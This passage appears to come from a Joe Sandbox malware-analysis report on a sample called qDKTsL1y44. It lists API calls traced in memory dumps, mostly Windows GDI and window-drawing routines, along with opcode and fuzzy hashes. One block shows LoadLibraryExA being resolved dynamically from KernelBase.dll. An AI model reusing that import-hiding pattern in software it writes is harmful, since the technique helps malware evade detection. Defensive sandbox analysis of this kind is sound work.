                                                                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0420389F
                                                                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 042038C4
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 042038CE
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 042038D8
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042038EB
                                                                                                                                  • DeleteObject.GDI32(?), ref: 042038F4
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 04203916
                                                                                                                                  • DeleteDC.GDI32(?), ref: 0420391F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3976802218-0
                                                                                                                                  • Opcode ID: 7619ea24317fa7f5268b0f6aec8dff2afabed4d0066257ba032a99cd7c82c45e
                                                                                                                                  • Instruction ID: a2e53104a63b2eb4f539147db31f52a35a48c8938b1ac97fac9bd57e18cac6a0
                                                                                                                                  • Opcode Fuzzy Hash: 7619ea24317fa7f5268b0f6aec8dff2afabed4d0066257ba032a99cd7c82c45e
                                                                                                                                  • Instruction Fuzzy Hash: 6381A0B5A00609AFEB50DFA9CD85EAF7BFCEB0C614F914554FA18E7280C635ED008B61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetObjectA.GDI32(?,00000054,?), ref: 04205667
                                                                                                                                  • GetDC.USER32(00000000), ref: 04205695
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 042056A6
                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 042056C1
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042056DB
                                                                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 042056FD
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0420570B
                                                                                                                                  • SelectObject.GDI32(?), ref: 04205753
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 04205766
                                                                                                                                  • RealizePalette.GDI32(?), ref: 0420576F
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0420577B
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04205784
                                                                                                                                  • SetBkColor.GDI32(?), ref: 0420578E
                                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 042057B2
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 042057BC
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042057CF
                                                                                                                                  • DeleteObject.GDI32 ref: 042057DB
                                                                                                                                  • DeleteDC.GDI32(?), ref: 042057F1
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0420580C
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 04205828
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 04205839
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 332224125-0
                                                                                                                                  • Opcode ID: a2950f8a3807c73e452b43fb0d5c8e1bbfa96bbaba52561d3451a08a909fe264
                                                                                                                                  • Instruction ID: 64f5ed0d3cf3da3b8ed8bc2609ee55412ac344e4e5f64bf8bc691db99e0157e5
                                                                                                                                  • Opcode Fuzzy Hash: a2950f8a3807c73e452b43fb0d5c8e1bbfa96bbaba52561d3451a08a909fe264
                                                                                                                                  • Instruction Fuzzy Hash: 3D510E75F10609BBEB11DBE9CC84BAEB7FCAB08704F908855B614E7191D774A980CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 04206642
                                                                                                                                  • CreateCompatibleDC.GDI32(00000001), ref: 042066A7
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 042066BC
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042066C6
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 042066F6
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04206702
                                                                                                                                  • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 04206726
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0420677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04206734
                                                                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 04206766
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 04206773
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 04206779
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                                                  • String ID: ($BM
                                                                                                                                  • API String ID: 2831685396-2980357723
                                                                                                                                  • Opcode ID: 2a2a68c3cd07fd1fa4c719d89a0534c2772b1853f7f64584c62d2e2173119b49
                                                                                                                                  • Instruction ID: 8c65ad5c401bc8ec5aa1d6eb03d9503cd13d98b65bdccc2bce976784e6321165
                                                                                                                                  • Opcode Fuzzy Hash: 2a2a68c3cd07fd1fa4c719d89a0534c2772b1853f7f64584c62d2e2173119b49
                                                                                                                                  • Instruction Fuzzy Hash: 7ED138B4B102199FEF14DFA9C894BAEBBF5FF48304F048465E904AB296D734E950CB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowDC.USER32(00000000), ref: 04222DBC
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 04222DDF
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 04222DF1
                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04222E07
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 04222E1C
                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0422303B), ref: 04222E35
                                                                                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 04222E53
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 04222E6D
                                                                                                                                  • DrawEdge.USER32(?,?,?,00000008), ref: 04222F6C
                                                                                                                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 04222F85
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 04222FAF
                                                                                                                                  • GetRgnBox.GDI32(?,?), ref: 04222FBE
                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04222FD4
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 04222FE5
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 04222FFA
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 04223016
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 04223035
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2490777911-0
                                                                                                                                  • Opcode ID: 50e0b154dcf86c20dcbec3d1fb44cea2e95a35d0232821ecbc2dbf364b43a48c
                                                                                                                                  • Instruction ID: 20ff94776406596f483c0947f213faccf04ca7817c21c6cc74338bfd775ee010
                                                                                                                                  • Opcode Fuzzy Hash: 50e0b154dcf86c20dcbec3d1fb44cea2e95a35d0232821ecbc2dbf364b43a48c
                                                                                                                                  • Instruction Fuzzy Hash: 34A12871E10618AFEB01DBA8C995EEEB7F9AF09304F1440A5F914EB291C775BE01CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0420614C: GetDC.USER32(00000000), ref: 042061A2
                                                                                                                                    • Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
                                                                                                                                    • Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
                                                                                                                                    • Part of subcall function 0420614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
                                                                                                                                    • Part of subcall function 0420614C: ReleaseDC.USER32(00000000,00000000), ref: 042061F0
                                                                                                                                  • SelectPalette.GDI32(?,?,000000FF), ref: 04205B97
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04205BA6
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000000C), ref: 04205BB8
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000000E), ref: 04205BC7
                                                                                                                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 04205BFA
                                                                                                                                  • SetStretchBltMode.GDI32(?,00000004), ref: 04205C08
                                                                                                                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 04205C20
                                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 04205C3D
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04205C9E
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 04205CB3
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 04205D12
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 04205D21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2414602066-0
                                                                                                                                  • Opcode ID: 310472923394222552277036a147809781e5e45111c682e47dfc73e956dddafb
                                                                                                                                  • Instruction ID: 2ba0b7644162b1d8e2677008858bc88ba47bcd80bdc4bc27cafb813791d8e3e6
                                                                                                                                  • Opcode Fuzzy Hash: 310472923394222552277036a147809781e5e45111c682e47dfc73e956dddafb
                                                                                                                                  • Instruction Fuzzy Hash: DE7113B9B10605AFEB50DBA9C984F6ABBF8AB08204F548555B548DB282D734FD40CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04203527
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04203531
                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 04203551
                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 04203568
                                                                                                                                  • GetDC.USER32(00000000), ref: 04203574
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 042035A1
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 042035C7
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 042035E2
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042035F1
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0420361D
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0420362B
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 04203639
                                                                                                                                  • DeleteDC.GDI32(?), ref: 0420364F
                                                                                                                                  • DeleteDC.GDI32(?), ref: 04203658
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 644427674-0
                                                                                                                                  • Opcode ID: d5a5526131a13defdde89de74c440687350e76276e554184e25e01f17e2559c0
                                                                                                                                  • Instruction ID: 144cf646163371a887227b9f6604585d8fcb98764e202568ab4562841067357e
                                                                                                                                  • Opcode Fuzzy Hash: d5a5526131a13defdde89de74c440687350e76276e554184e25e01f17e2559c0
                                                                                                                                  • Instruction Fuzzy Hash: 5841E9B6F10649AFEB11DBE9CC81FAEB7FCEB08704F904411BA14E7281D775A9008B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 041E7454
                                                                                                                                  • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 041E7460
                                                                                                                                  • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 041E746F
                                                                                                                                  • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 041E747B
                                                                                                                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 041E7493
                                                                                                                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 041E74B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Window$Register$Send$Find
                                                                                                                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                  • API String ID: 3569030445-3736581797
                                                                                                                                  • Opcode ID: 50993273041994f7eb4e0046a0e3bc96569eacacd6806141c6d8e36748c8d4ee
                                                                                                                                  • Instruction ID: 8dd554540133d789b40745f275915e4895d0c1e5d8af293b0a48ede1070fcf59
                                                                                                                                  • Opcode Fuzzy Hash: 50993273041994f7eb4e0046a0e3bc96569eacacd6806141c6d8e36748c8d4ee
                                                                                                                                  • Instruction Fuzzy Hash: 2E111C79244B06AFF7149FA6DCC1F76BBE8EF44710F148465B9648B281E7B0B940CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0420DDAF
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0420DDCA
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 0420DDDF
                                                                                                                                  • GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 0420DDED
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0420DE1E
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 0420DE33
                                                                                                                                  • GetSystemMetrics.USER32(00000003), ref: 0420DE3C
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0420DE4B
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0420DE78
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0420DE86
                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0420DEEF,?,00000000,?,?,?,00000000,?), ref: 0420DEAB
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0420DEE9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 19621357-0
                                                                                                                                  • Opcode ID: 32f7412d9651d6f655fa0ec17a2aad9aefef7d6e4e0b12d787ce770864d40c89
                                                                                                                                  • Instruction ID: 0a931cab60da6272710390b9510f23dc963c2cbbb8f27510379d19997d293403
                                                                                                                                  • Opcode Fuzzy Hash: 32f7412d9651d6f655fa0ec17a2aad9aefef7d6e4e0b12d787ce770864d40c89
                                                                                                                                  • Instruction Fuzzy Hash: 86414A71A10619ABEB00EAE9CD81EEFB7BDEF49324F104551FA14F7281CB31AA018760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 041E296A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                                  • Opcode ID: 08b4f1a3af41a7159748cb8f22a1aac93d389f3fe8567b6999801bdd3ebd2ebe
                                                                                                                                  • Instruction ID: 6d2179513da0cc2ed913594f686703e52372c5b5f91539301902e4095c9d7393
                                                                                                                                  • Opcode Fuzzy Hash: 08b4f1a3af41a7159748cb8f22a1aac93d389f3fe8567b6999801bdd3ebd2ebe
                                                                                                                                  • Instruction Fuzzy Hash: 12A11A38B046688BEF219B2ECCD0BF877E9EB09714F1441E4E549AB342CB75A9C5CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0420B285
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420B2AA
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420B2B5
                                                                                                                                  • GetClipBox.GDI32(?,?), ref: 0420B2C7
                                                                                                                                  • GetDCOrgEx.GDI32(?,?), ref: 0420B2D4
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 0420B2ED
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 0420B2FE
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 0420B314
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                  • String ID: EnumDisplayMonitors
                                                                                                                                  • API String ID: 362875416-2491903729
                                                                                                                                  • Opcode ID: 45860182dcff875baef590a36c9bbc4d6e0fb8f38e5af68c4e862ca70abf601c
                                                                                                                                  • Instruction ID: 3baac9e216ac0696dd10a71c7c7d4a8ba6f4ba038c09102c0927d8fcde4ecbca
                                                                                                                                  • Opcode Fuzzy Hash: 45860182dcff875baef590a36c9bbc4d6e0fb8f38e5af68c4e862ca70abf601c
                                                                                                                                  • Instruction Fuzzy Hash: 5D31FC75E1060AAFDB10DBE598849FFBBFCEB05210F148126E915E2241E734B945CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 04238D04
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04238D1B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04238D21
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 04238DAF
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 04238DBB
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 04238DCF
                                                                                                                                  Strings
                                                                                                                                  • C:\Windows\System32\KernelBase.dll, xrefs: 04238D16
                                                                                                                                  • LoadLibraryExA, xrefs: 04238D11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Read$AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                  • API String ID: 1061262613-1650066521
                                                                                                                                  • Opcode ID: b92292cdd9396ef5d24f0f0a2d0a1fb79ad31756b89617cd6ee983ed93a40ef9
                                                                                                                                  • Instruction ID: 38fb25db01a3cc314b5966a3fae3d71177ecf389854cdfc1bfed8ffe011f5927
                                                                                                                                  • Opcode Fuzzy Hash: b92292cdd9396ef5d24f0f0a2d0a1fb79ad31756b89617cd6ee983ed93a40ef9
                                                                                                                                  • Instruction Fuzzy Hash: E8314BB571030ABBEB20EF69CC85F6A77F8AF14729F404150FA14EB281D374B94087A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 0421FF37
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0421FF5B
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0421FF66
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0421FF6D
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0421FF7D
                                                                                                                                  • BeginPaint.USER32(00000000,?,00000000,0422003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0421FF9F
                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0421FFFB
                                                                                                                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0422000C
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 04220026
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0422002F
                                                                                                                                  • DeleteObject.GDI32(?), ref: 04220038
                                                                                                                                    • Part of subcall function 0421F8F4: BeginPaint.USER32(00000000,?), ref: 0421F91F
                                                                                                                                    • Part of subcall function 0421F8F4: EndPaint.USER32(00000000,?,0421FA5A), ref: 0421FA4D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
